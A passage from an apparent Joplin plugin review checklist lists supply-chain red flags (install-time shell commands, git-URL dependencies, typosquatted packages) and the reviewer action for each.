- The Threat: The plugin or a dependency is trying to execute terminal commands on the user's machine the moment it is downloaded.
The Reviewer's Action: Hard Reject.
In Joplin, there is almost zero reason for a plugin to run shell commands during installation.
2. Flag: Non-Registry Sources (Git URLs)
- The Threat: The
package.jsonpoints to a URL likegithub:someuser/somerepoor an HTTP link instead of an official npm version.
The Reviewer's Action: Block & Demand Migration.
Reviewer can refuses to approve the plugin because it breaks the security scanner's ability to track it.
3. Flag: Direct Dependency Typosquatting
If there is a typosquatted package the plugin should be rejected immediately.





